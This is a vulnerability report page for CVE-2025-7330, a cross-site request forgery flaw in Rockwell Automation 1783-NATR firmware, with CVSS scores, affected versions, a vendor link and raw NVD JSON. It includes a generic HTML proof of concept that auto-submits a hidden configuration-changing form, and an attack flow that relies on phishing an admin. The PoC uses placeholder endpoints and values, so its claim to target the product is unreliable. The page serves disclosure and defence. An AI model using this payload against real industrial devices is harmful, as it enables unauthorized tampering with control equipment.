Security Vulnerability Report
CVE-2025-7330 (CVSS 6.5, MEDIUM)

Published: 2025-10-14 13:15:39
Last Modified: 2025-10-30 21:41:48

Description

A cross-site request forgery security issue exists in the product and version listed. The vulnerability stems from missing CSRF checks on the impacted form. This allows for unintended configuration modification if an attacker can convince a logged-in admin to visit a crafted link.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
CVSS 4.0 (Secondary): 7.0 HIGH, CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N

Configurations (Affected Products)

cpe:2.3:o:rockwellautomation:1783-natr_firmware:*:*:*:*:*:*:*:* - VULNERABLE (versions before 1.007)
cpe:2.3:h:rockwellautomation:1783-natr:-:*:*:*:*:*:*:* - NOT VULNERABLE
Rockwell Automation related products (for the specific affected versions, see the official security advisory SD1756)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
HTML
<!-- CVE-2025-7330 CSRF Proof of Concept -->
<!-- This PoC demonstrates a CSRF attack against a Rockwell Automation product -->
<!-- The attacker hosts this HTML page and tricks an authenticated admin into visiting it -->
<!DOCTYPE html>
<html>
<head>
  <title>Loading...</title>
</head>
<body>
  <h1>Please wait...</h1>
  <!-- Auto-submit form to modify configuration without CSRF token -->
  <form id="csrfForm" action="https://target-rockwell-product/config-endpoint" method="POST">
    <input type="hidden" name="config_param1" value="malicious_value1" />
    <input type="hidden" name="config_param2" value="malicious_value2" />
    <input type="hidden" name="action" value="modify_config" />
  </form>
  <script>
    // Auto-submit the form when the page loads
    document.getElementById('csrfForm').submit();
  </script>
  <!-- Alternative: IMG tag based CSRF for GET requests -->
  <!-- <img src="https://target-rockwell-product/config-endpoint?param=malicious_value" style="display:none" /> -->
</body>
</html>
<!--
Attack Flow:
1. Admin logs into the Rockwell Automation product management interface
2. Attacker sends a phishing email/link containing this HTML page
3. Admin clicks the link while still authenticated
4. Browser auto-submits the form with the admin's session cookies
5. Server processes the request without CSRF validation
6. Configuration is modified as the attacker intended
-->

References

https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1756.html (Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-7330",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-14T13:15:39.323",
    "lastModified": "2025-10-30T21:41:48.407",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A cross-site request forgery security issue exists in the product and version listed. The vulnerability stems from missing CSRF checks on the impacted form. This allows for unintended configuration modification if an attacker can convince a logged in admin to visit a crafted link."
      }
    ],
    "metrics": {
      "cvssMetricV40": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "4.0",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
            "baseScore": 7.0,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "privilegesRequired": "NONE",
            "userInteraction": "ACTIVE",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "HIGH",
            "vulnAvailabilityImpact": "HIGH",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "subAvailabilityImpact": "NONE",
            "exploitMaturity": "NOT_DEFINED",
            "confidentialityRequirement": "NOT_DEFINED",
            "integrityRequirement": "NOT_DEFINED",
            "availabilityRequirement": "NOT_DEFINED",
            "modifiedAttackVector": "NOT_DEFINED",
            "modifiedAttackComplexity": "NOT_DEFINED",
            "modifiedAttackRequirements": "NOT_DEFINED",
            "modifiedPrivilegesRequired": "NOT_DEFINED",
            "modifiedUserInteraction": "NOT_DEFINED",
            "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
            "modifiedVulnIntegrityImpact": "NOT_DEFINED",
            "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
            "modifiedSubConfidentialityImpact": "NOT_DEFINED",
            "modifiedSubIntegrityImpact": "NOT_DEFINED",
            "modifiedSubAvailabilityImpact": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "valueDensity": "NOT_DEFINED",
            "vulnerabilityResponseEffort": "NOT_DEFINED",
            "providerUrgency": "NOT_DEFINED"
          }
        }
      ],
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-352"
          }
        ]
      }
    ],
    "configurations": [
      {
        "operator": "AND",
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:o:rockwellautomation:1783-natr_firmware:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "1.007",
                "matchCriteriaId": "37063188-4380-47A4-8179-50AACB1D9C4D"
              }
            ]
          },
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": false,
                "criteria": "cpe:2.3:h:rockwellautomation:1783-natr:-:*:*:*:*:*:*:*",
                "matchCriteriaId": "FEAE0B20-4A7B-4A7F-826E-A986A4CFE08D"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1756.html",
        "source": "[email protected]",
        "tags": [
          "Vendor Advisory"
        ]
      }
    ]
  }
}